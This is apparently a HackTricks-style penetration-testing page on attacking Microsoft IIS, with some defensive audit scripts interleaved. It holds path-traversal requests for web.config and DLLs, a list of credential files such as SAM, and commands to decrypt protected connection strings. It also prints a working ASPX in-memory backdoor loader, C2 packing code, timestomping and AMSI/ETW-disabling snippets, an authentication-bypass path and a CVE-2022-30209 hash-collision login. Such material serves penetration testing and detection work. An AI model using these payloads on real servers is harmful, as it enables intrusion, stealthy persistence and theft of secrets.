IIS - Internet Information Services


Executable file extensions worth testing:

  • asp
  • aspx
  • config
  • php

Internal IP Address Disclosure

On any IIS server that answers with a 302 you can try removing the Host header and using HTTP/1.0; in the response, the Location header may point at the internal IP address:

nc -v domain.com 80
openssl s_client -connect domain.com:443

Response disclosing the internal IP:

GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
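A small self-check for the leak described above, written for this page (not HackTricks code): it parses a raw response and reports whether a 3xx Location points at a private address, and which vendor headers expose internal host names. The sample response is constructed from the one shown above; the header names beyond X-FEServer are the Exchange ones the author of this example knows of.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample modelled on the response above (not a real capture)
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Cache-Control: no-cache\r\n"
    "Pragma: no-cache\r\n"
    "Location: https://192.168.5.237/owa/\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-FEServer: NHEXCHANGE2016\r\n"
    "\r\n"
)

# Headers that Exchange/IIS front ends are known to stamp with internal host names
HOSTNAME_HEADERS = ("x-feserver", "x-beserver")


def parse_response(raw):
    """Split a raw HTTP response into (status_code, {lower-cased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split()
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def internal_ip_in_location(raw):
    """Return the private or link-local address a 3xx Location points at, else None."""
    status, headers = parse_response(raw)
    if not 300 <= status < 400 or "location" not in headers:
        return None
    host = urlsplit(headers["location"]).hostname
    if not host:
        return None
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None  # a DNS name, not a literal address
    return str(ip) if (ip.is_private or ip.is_link_local) else None


def leaked_hostnames(raw):
    """Collect vendor headers that expose internal server names."""
    _, headers = parse_response(raw)
    return {k: v for k, v in headers.items() if k in HOSTNAME_HEADERS}
```

Feed it the bytes you get back from the nc/openssl session above; a non-empty result means the redirect target or front-end name should be rewritten at the reverse proxy.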

Execute .config files

You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: Download example here

More information and techniques to exploit this vulnerability here

IIS Discovery Bruteforce

Download the list I created:

It was created by merging the contents of the following lists:

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt
http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt
https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt

Use it without adding any extension; the files that need one already have it.

Path Traversal

Leaking source code

Check the full writeup at: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html

Tip: In summary, there are several web.config files inside the application folders with references to assemblyIdentity files and namespaces. With this information it is possible to learn where the executables are located and download them.
From the downloaded DLLs it is also possible to find new namespaces that you should try to access in order to retrieve their web.config file and discover further namespaces and assemblyIdentity entries.
Also, the files connectionstrings.config and global.asax may contain interesting information.

In .Net MVC applications, the web.config file plays a crucial role by specifying every binary file the application depends on through "assemblyIdentity" XML tags.

Exploring Binary Files

An example of accessing the web.config file is shown below:

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

This request reveals various settings and dependencies, such as:

  • EntityFramework version
  • AppSettings for web pages, client validation, and JavaScript
  • System.web configuration for authentication and runtime
  • System.webServer module settings
  • Runtime assembly bindings for many libraries such as Microsoft.Owin, Newtonsoft.Json, and System.Web.Mvc

These settings indicate that certain files, such as /bin/WebGrease.dll, are located in the application's /bin folder.

Root Directory Files

Files found in the root directory, such as /global.asax and /connectionstrings.config (which contains sensitive passwords), are essential to the application's configuration and operation.

Namespaces and Web.Config

MVC applications also define additional web.config files for specific namespaces to avoid repetitive declarations in every file, as shown by a request to download another web.config:

GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded

Downloading DLLs

The mention of a custom namespace hints at a DLL named WebApplication1 present in the /bin directory. Following that, a request to download WebApplication1.dll is shown:

GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded

This suggests the presence of other essential DLLs, such as System.Web.Mvc.dll and System.Web.Optimization.dll, in the /bin directory.

In a scenario where a DLL imports a namespace called WebApplication1.Areas.Minded, an attacker might infer the existence of other web.config files in predictable paths, such as /area-name/Views/, containing specific configurations and references to other DLLs in the /bin folder. For instance, a request to /Minded/Views/web.config can reveal configurations and namespaces that indicate the presence of another DLL, WebApplication1.AdditionalFeatures.dll.

Common files

From here

C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
C:\Program Files (x86)\php\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

HTTPAPI 2.0 404 Error

If you see an error like the following:

It means that the server did not receive the correct domain name in the Host header.
To reach the web page you can inspect the served SSL certificate, where you may find the domain/subdomain name. If it is not there you may need to brute force VHosts until you find the correct one.

Decrypt protected settings and ASP.NET Core Data Protection key rings

Two common patterns for protecting secrets in .NET apps hosted on IIS are:

  • ASP.NET Protected Configuration (RsaProtectedConfigurationProvider) for web.config sections such as <connectionStrings>.
  • ASP.NET Core Data Protection key ring (persisted locally) used to protect application secrets and cookies.

If you have filesystem access or interactive access on the web server, the co-located keys usually make it possible to decrypt the protected content.

  • ASP.NET (Full Framework) – decrypt protected config sections with aspnet_regiis:

REM Decrypt a section by app path (site configured in IIS)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pd "connectionStrings" -app "/MyApplication"

REM Or specify the physical path (-pef encrypts / -pdf decrypts a section of the web.config under a directory)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" "C:\inetpub\wwwroot\MyApplication"

  • ASP.NET Core – look for locally persisted Data Protection key rings (XML/JSON files) in locations such as:
    • %PROGRAMDATA%\Microsoft\ASP.NET\DataProtection-Keys
    • HKLM\SOFTWARE\Microsoft\ASP.NET\Core\DataProtection-Keys (registry)
    • App-managed folder (e.g., App_Data\keys or a Keys directory next to the app)

If the key ring is accessible, an operator running under the app's identity can instantiate an IDataProtector with the same purposes and call Unprotect on the stored secrets. Misconfigurations that persist the key ring next to the app files make offline decryption trivial once the host is compromised.
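An audit helper for the two misconfigurations just described, added here as an example (not part of HackTricks or ASP.NET Core): it flags a key file whose master key is stored in clear rather than wrapped by DPAPI or a certificate, and a key ring that lives inside the site's physical path. The key file is a constructed sample laid out like the key-<guid>.xml files ASP.NET Core writes; the paths are assumed.

```python
import xml.etree.ElementTree as ET

# Constructed sample of an unprotected key file, laid out like the key-<guid>.xml files
# ASP.NET Core persists (the key material below is dummy, not a real key)
SAMPLE_KEY_XML = """<?xml version="1.0" encoding="utf-8"?>
<key id="11111111-2222-3333-4444-555555555555" version="1">
  <creationDate>2024-01-01T00:00:00.0000000Z</creationDate>
  <activationDate>2024-01-01T00:00:00.0000000Z</activationDate>
  <expirationDate>2024-04-01T00:00:00.0000000Z</expirationDate>
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptorDescriptorDeserializer, Microsoft.AspNetCore.DataProtection">
    <descriptor>
      <encryption algorithm="AES_256_CBC" />
      <validation algorithm="HMACSHA256" />
      <masterKey p:requiresEncryption="true" xmlns:p="http://schemas.asp.net/2015/03/dataProtection">
        <!-- Warning: the key below is in an unencrypted form. -->
        <value>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=</value>
      </masterKey>
    </descriptor>
  </descriptor>
</key>
"""


def _local(tag):
    """Strip an XML namespace prefix: '{ns}masterKey' -> 'masterKey'."""
    return tag.rsplit("}", 1)[-1]


def _norm(path):
    """Normalise a Windows or POSIX path for prefix comparison."""
    return path.replace("\\", "/").rstrip("/").lower() + "/"


def audit_key_file(xml_text, key_path, app_root):
    """Return findings for one Data Protection key file.

    key_path is where the file was found, app_root is the site's physical path.
    """
    findings = []
    root = ET.fromstring(xml_text)
    names = {_local(el.tag) for el in root.iter()}
    # A DPAPI/X.509-protected key carries <encryptedKey>; a bare <masterKey> is plaintext
    if "masterKey" in names and "encryptedKey" not in names:
        findings.append("master key stored unencrypted; protect the key ring "
                        "(ProtectKeysWithDpapi or an X.509 certificate)")
    if _norm(key_path).startswith(_norm(app_root)):
        findings.append("key ring lives inside the application folder; a file-read or "
                        "path-traversal bug exposes it together with the app")
    return findings
```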

IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)

The Phantom Taurus/NET-STAR toolkit shows a mature pattern for fileless IIS persistence and post‑exploitation that runs entirely inside w3wp.exe. The core ideas apply broadly, both to custom tradecraft and to detection/hunting.

Key primitives

  • ASPX bootstrapper hosting an embedded payload: a single .aspx page (e.g., OutlookEN.aspx) carries a Base64‑encoded, optionally Gzip‑compressed .NET DLL. On a trigger request it decodes, decompresses and reflectively loads the DLL into the current AppDomain and calls its main entry point (e.g., ServerRun.Run()).
  • Cookie‑scoped, encrypted C2 with multi‑stage packing: tasks/results are wrapped as Gzip → AES‑ECB/PKCS7 → Base64 and carried in legitimate‑looking requests with many cookies; operators used stable delimiters (e.g., "STAR") for chunking.
  • Reflective .NET execution: accepts arbitrary managed assemblies as Base64, loads them via Assembly.Load(byte[]) and passes operator args, allowing fast module swaps without touching disk.
  • Operating in precompiled ASP.NET sites: adds/manages auxiliary shells/backdoors even when the site is precompiled (e.g., the dropper adds dynamic pages/handlers or uses config handlers), exposed through commands such as bypassPrecompiledApp, addshell, listshell, removeshell.
  • Timestomping/metadata forgery: exposes a changeLastModified action and timestomps at deployment time (including future compilation timestamps) to hinder DFIR.
  • Optional AMSI/ETW pre‑disable for loaders: the second‑stage loader can disable AMSI and ETW before calling Assembly.Load to reduce inspection of in‑memory payloads.

Minimal ASPX loader pattern

<%@ Page Language="C#" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
    // 1) Obtain payload bytes (hard‑coded blob or from request)
    string b64 = /* hardcoded or Request["d"] */;
    byte[] blob = Convert.FromBase64String(b64);
    // optional: decrypt here if AES is used
    using(var gz = new GZipStream(new MemoryStream(blob), CompressionMode.Decompress)){
        using(var ms = new MemoryStream()){
            gz.CopyTo(ms);
            var asm = Assembly.Load(ms.ToArray());
            // 2) Invoke the managed entry point (e.g., ServerRun.Run)
            var t = asm.GetType("ServerRun");
            var m = t.GetMethod("Run", BindingFlags.Public|BindingFlags.NonPublic|BindingFlags.Static|BindingFlags.Instance);
            object inst = m.IsStatic ? null : Activator.CreateInstance(t);
            m.Invoke(inst, new object[]{ HttpContext.Current });
        }
    }
}
</script>

Packing/crypto helper (Gzip + AES‑ECB + Base64)

using System;
using System.IO;
using System.IO.Compression;
using System.Security.Cryptography;

// Serialize/Deserialize are the operator's own encoding (TLV/JSON/msgpack) and are not shown here
static byte[] AesEcb(byte[] data, byte[] key, bool encrypt){
    using(var aes = Aes.Create()){
        aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.PKCS7; aes.Key = key;
        ICryptoTransform t = encrypt ? aes.CreateEncryptor() : aes.CreateDecryptor();
        return t.TransformFinalBlock(data, 0, data.Length);
    }
}

static string Pack(object obj, byte[] key){
    // serialize → gzip → AES‑ECB → Base64
    byte[] raw = Serialize(obj);                    // your TLV/JSON/msgpack
    using var ms = new MemoryStream();
    using(var gz = new GZipStream(ms, CompressionLevel.Optimal, true)) gz.Write(raw, 0, raw.Length);
    byte[] enc = AesEcb(ms.ToArray(), key, true);
    return Convert.ToBase64String(enc);
}

static T Unpack<T>(string b64, byte[] key){
    // Base64 → AES‑ECB → gunzip → deserialize (the reverse of Pack)
    byte[] enc = Convert.FromBase64String(b64);
    byte[] cmp = AesEcb(enc, key, false);
    using var gz = new GZipStream(new MemoryStream(cmp), CompressionMode.Decompress);
    using var outMs = new MemoryStream(); gz.CopyTo(outMs);
    return Deserialize<T>(outMs.ToArray());
}

Cookie/session flow and command surface

  • Session bootstrap and tasking are sent via cookies to blend in with normal web activity.
  • Commands observed in the wild included: fileExist, listDir, createDir, renameDir, fileRead, deleteFile, createFile, changeLastModified; addshell, bypassPrecompiledApp, listShell, removeShell; executeSQLQuery, ExecuteNonQuery; and the dynamic execution primitives code_self, code_pid, run_code for in‑memory .NET execution.

Timestomping helper

// path: file to modify; ts: the DateTime to forge (System.IO)
File.SetCreationTime(path, ts);
File.SetLastWriteTime(path, ts);
File.SetLastAccessTime(path, ts);

Disable AMSI/ETW inline before Assembly.Load (loader variant)

// Patch amsi!AmsiScanBuffer to return E_INVALIDARG
// and ntdll!EtwEventWrite to a stub; then load operator assembly
DisableAmsi();
DisableEtw();
Assembly.Load(payloadBytes).EntryPoint.Invoke(null, new object[]{ new string[]{ /* args */ } });

See AMSI/ETW bypass techniques in: windows-hardening/av-bypass.md

Hunting notes (defenders)

  • A single unusual ASPX page containing very long Base64/Gzip blobs; POST requests carrying many cookies.
  • Unbacked managed modules inside w3wp.exe; strings such as Encrypt/Decrypt (ECB), Compress/Decompress, GetContext, Run.
  • Repeated delimiters such as "STAR" in traffic; inconsistent or even future-dated timestamps on ASPX files/assemblies.
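A triage scorer for the first and third hunting notes, added as an example (not a HackTricks or NET-STAR tool): it flags .aspx files that carry long Base64 runs together with reflective-loading API names, files whose last-write time lies in the future, and Cookie headers with an unusual number of cookies. Thresholds and the two sample pages are constructed; timestamps are epoch seconds as returned by os.stat().

```python
import re

# A Base64 run this long inside page markup is rarely legitimate
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{512,}={0,2}")
# Markers that together indicate reflective loading of an embedded assembly
LOADER_MARKERS = (
    "Assembly.Load(", "FromBase64String(", "GZipStream(",
    "Activator.CreateInstance(", "GetMethod(",
)

# Constructed sample page: loader markers in comments plus a dummy blob (not a working payload)
SUSPICIOUS_PAGE = (
    '<%@ Page Language="C#" %>\n<script runat="server">\n'
    '// string b64 = "' + "QUFB" * 200 + '";\n'
    '// Convert.FromBase64String(b64); new GZipStream(...); Assembly.Load(bytes);\n'
    "</script>\n"
)
# Constructed ordinary page for comparison
BENIGN_PAGE = (
    '<%@ Page Language="C#" %>\n<script runat="server">\n'
    "protected void Page_Load(object sender, EventArgs e) { lbl.Text = DateTime.Now.ToString(); }\n"
    "</script>\n"
)


def score_aspx(text, last_write, now):
    """Score one .aspx file; returns (score, reasons). last_write/now are epoch seconds."""
    reasons = []
    blobs = LONG_B64.findall(text)
    if blobs:
        reasons.append("%d Base64 blob(s) of 512+ chars (longest %d)"
                       % (len(blobs), max(map(len, blobs))))
    hits = [m for m in LOADER_MARKERS if m in text]
    if len(hits) >= 2:
        reasons.append("reflective-loading markers: " + ", ".join(hits))
    if last_write > now:
        reasons.append("last-write time is in the future (possible timestomping)")
    return len(reasons), reasons


def cookie_count(cookie_header):
    """Number of name=value pairs in a Cookie header; tasking chunked over cookies inflates it."""
    return sum(1 for c in cookie_header.split(";") if "=" in c)
```

Run score_aspx over every .aspx under the site root and sort by score; pair cookie_count with the IIS logs' cs(Cookie) field to spot the request side.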

Telerik UI WebResource.axd unsafe reflection (CVE-2025-3600)

Many ASP.NET apps embed Telerik UI for ASP.NET AJAX and expose the unauthenticated handler Telerik.Web.UI.WebResource.axd. When the Image Editor cache endpoint is reachable (type=iec), the parameters dkey=1 and prtype enable unsafe reflection that executes any public parameterless constructor pre‑auth. This yields a universal DoS primitive and can escalate to pre‑auth RCE on apps with insecure AppDomain.AssemblyResolve handlers.

See detailed techniques and PoCs here:

Telerik Ui Aspnet Ajax Unsafe Reflection Webresource Axd

Old IIS vulnerabilities worth looking for

Microsoft IIS tilde character "~" Vulnerability/Feature – Short File/Folder Name Disclosure

You can try to enumerate folders and files inside every discovered folder (even if it requires Basic Authentication) using this technique.
The main limitation of this technique, if the server is vulnerable, is that it can only recover up to the first 6 letters of each file/folder name and the first 3 letters of the file extension.

You can use https://github.com/irsdl/IIS-ShortName-Scanner to test for this vulnerability:

java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

Original research: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

You can also use metasploit: use scanner/http/iis_shortname_scanner

A good way to recover the full name of the discovered files is to ask LLMs for candidates, as done in the script https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py
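To see exactly what the 6+3 disclosure gives away for a given web root, this added example (not HackTricks or IIS-ShortName-Scanner code) reproduces the simplified NTFS 8.3 name generation, including the ~1, ~2 sequence for colliding prefixes. It goes beyond the single-name rule stated above by assigning names per directory; real NTFS switches to a hash-based short name after several collisions, which is not modelled here.

```python
import re

# Characters outside this set are replaced with "_" in a short name (simplified rule set)
_INVALID = re.compile(r"[^A-Z0-9!#$%&'()\-@^_`{}~]")


def short_name(long_name, seq=1):
    """8.3 name NTFS would generate for long_name (simplified algorithm).

    Returns the upper-cased name itself when it already fits 8.3 (no tilde name needed).
    """
    upper = long_name.upper()
    stem = upper.lstrip(".")                      # leading dots never count as a separator
    if "." in stem:
        base, ext = stem.rsplit(".", 1)
    else:
        base, ext = stem, ""
    base = _INVALID.sub("_", base.replace(".", "").replace(" ", ""))
    ext = _INVALID.sub("_", ext.replace(" ", ""))[:3]
    rebuilt = base + ("." + ext if ext else "")
    if rebuilt == upper and len(base) <= 8:
        return upper
    # First 6 characters survive, then ~N, then at most 3 extension characters
    return base[:6] + "~" + str(seq) + ("." + ext if ext else "")


def assign_short_names(names):
    """Assign ~1, ~2, ... within one directory the way NTFS does for colliding prefixes."""
    taken, result = set(), {}
    for name in names:
        seq = 1
        candidate = short_name(name, seq)
        while candidate in taken and candidate != name.upper():
            seq += 1
            candidate = short_name(name, seq)
        taken.add(candidate)
        result[name] = candidate
    return result
```

Disabling 8.3 name creation (fsutil 8dot3name set 1, then stripping existing short names) or rejecting "~" in URLs via IIS request filtering denyUrlSequences removes what this technique can enumerate.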

Basic Authentication bypass

Bypass Basic Authentication (IIS 7.5) by trying to access: /admin:$i30:$INDEX_ALLOCATION/admin.php or /admin::$INDEX_ALLOCATION/admin.php

You can try to combine this vulnerability with the previous one to find new folders and bypass the authentication.

ASP.NET Trace.AXD enabled debugging

ASP.NET has a debugging mode whose file is called trace.axd.

It keeps a very detailed log of all requests made to an application over a period of time.

This information includes remote client IPs, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.

https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/
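A web.config audit covering this section and the protected-configuration section above, written for this page (not HackTricks code): it reports a connectionStrings section that still holds a plaintext password instead of being wrapped by a configProtectionProvider, and a trace element that exposes trace.axd remotely. Both config fragments are constructed samples; the encrypted section shows only a placeholder where the real EncryptedData element would be.

```python
import xml.etree.ElementTree as ET

# Constructed web.config fragment with the weak settings (not from any real app)
WEAK_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="Main" connectionString="Server=db;User Id=app;Password=example-placeholder" />
  </connectionStrings>
  <system.web>
    <trace enabled="true" localOnly="false" />
  </system.web>
</configuration>
"""

# Same file after aspnet_regiis -pe "connectionStrings" and disabling tracing (placeholder ciphertext)
HARDENED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData>placeholder-ciphertext</EncryptedData>
  </connectionStrings>
  <system.web>
    <trace enabled="false" />
  </system.web>
</configuration>
"""


def _child(element, name):
    """Direct child lookup; ElementTree XPath cannot address tags containing '.' such as system.web."""
    if element is None:
        return None
    return next((c for c in element if c.tag == name), None)


def audit_web_config(xml_text):
    """Return a list of findings for one web.config."""
    findings = []
    root = ET.fromstring(xml_text)
    cs = _child(root, "connectionStrings")
    if cs is not None and cs.get("configProtectionProvider") is None:
        if any("password" in (a.get("connectionString") or "").lower() for a in cs.findall("add")):
            findings.append("connectionStrings is unprotected and contains a plaintext password; "
                            "encrypt the section with aspnet_regiis -pe")
    trace = _child(_child(root, "system.web"), "trace")
    # ASP.NET defaults: enabled="false", localOnly="true"
    if trace is not None and trace.get("enabled", "false").lower() == "true":
        if trace.get("localOnly", "true").lower() == "false":
            findings.append("trace.axd is enabled and reachable remotely (localOnly=false)")
        else:
            findings.append("trace.axd is enabled (localOnly=true, still visible to anyone on the host)")
    return findings
```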


ASPXAUTH uses the following information:

  • validationKey (string): hex-encoded key to use for signature validation.
  • decryptionMethod (string): (default "AES").
  • decryptionIV (string): hex-encoded initialization vector (defaults to a vector of zeros).
  • decryptionKey (string): hex-encoded key to use for decryption.

However, some deployments use the default values of these parameters and store the user's email in the cookie. Therefore, if you can find a site built on the same platform that uses the ASPXAUTH cookie, and you create a user there with the email of the user you want to impersonate on the target server, you may be able to use the cookie from the second server on the first one and impersonate that user.
This attack worked in a writeup.

IIS Authentication Bypass with cached passwords (CVE-2022-30209)

Full report here: the bug in the code did not properly check the password supplied by the user, so an attacker whose password hash hits a key that is already in the cache can log in as that user.

# script for sanity check
> type test.py
def HashString(password):
    j = 0
    for c in map(ord, password):
        j = c + (101*j)&0xffffffff
    return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
